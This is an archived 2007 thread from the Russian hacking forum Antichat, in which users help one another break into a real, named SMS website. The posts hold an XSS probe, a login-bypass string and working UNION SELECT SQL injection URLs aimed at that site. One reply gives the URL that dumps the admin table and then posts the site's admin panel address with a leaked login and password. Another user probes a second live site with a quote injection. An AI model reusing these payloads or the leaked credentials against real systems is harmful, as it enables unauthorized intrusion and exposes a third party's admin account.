ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу sql inj хелп ми
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

sql inj хелп ми
  #1  
Старый 30.10.2007, 20:48
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
Post sql inj хелп ми
Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено.
Вот ход моих действий.:
!)Иду по сцылге: http://mysms.ipsys.net/
2)Вижу там "Пошук" и сразу сую джаваскрипт:
PHP код:
"><script>alert()</script> 
Мне выдает:
Цитата:
Warning : preg_match() [function.preg-match]: Unknown modifier 'c' in /home/cmysms/public_html/shr.php on line 89
Понимаю с етим ничево не зделаю....
3) Смотрю дальше..
И вижу строчку:
Цитата:
http://mysms.ipsys.net/index.php?smstype=7
ОоО.Руки тянутся вбить
PHP код:
/index.php?smstype=phpinj 
Как результат -
Цитата:
Помилка запиту: SELECT * FROM `sms` WHERE parentid=СЏ AND dozvil=1
Warning : mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 95

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 101
Ничево нешарю в mysqlinj, потомо и незнаю что с етим делать...
4) Покопавшись исчо увидил
Цитата:
/admin/
Сразу вбил
PHP код:
 ') OR ('1'='
Ничяво..
Прошу хелпа у знающих...
Пасиб за внимание
Последний раз редактировалось Dimi4; 30.10.2007 в 20:50..
 

  #2  
Старый 30.10.2007, 20:54
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию
http://mysms.ipsys.net/index.php?smstype=0xaaaa+union+select+1,2,version( ),4,5/*
 

  #3  
Старый 30.10.2007, 20:56
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию
А как бы ето заюзать?
 

  #4  
Старый 30.10.2007, 20:58
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию
Код:
http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admin+limit+0,1
админка:
http://mysms.ipsys.net/admin/index.php
login:Baltazor
pass:stones
 

  #5  
Старый 30.10.2007, 23:59
street16
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989

Репутация: 3
По умолчанию
http://www.fuck.ru/products.aspx?id='
Значит ли че нить!!!!Иля я просто напрасно это делаю???
Server Error in '/' Application.
--------------------------------------------------------------------------------

Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>


Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
 

  #6  
Старый 31.10.2007, 00:18
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
К сожалению…напрасно)
 

  #7  
Старый 31.10.2007, 10:31
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
Используйте специально прикрепленную тему для вопросов.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ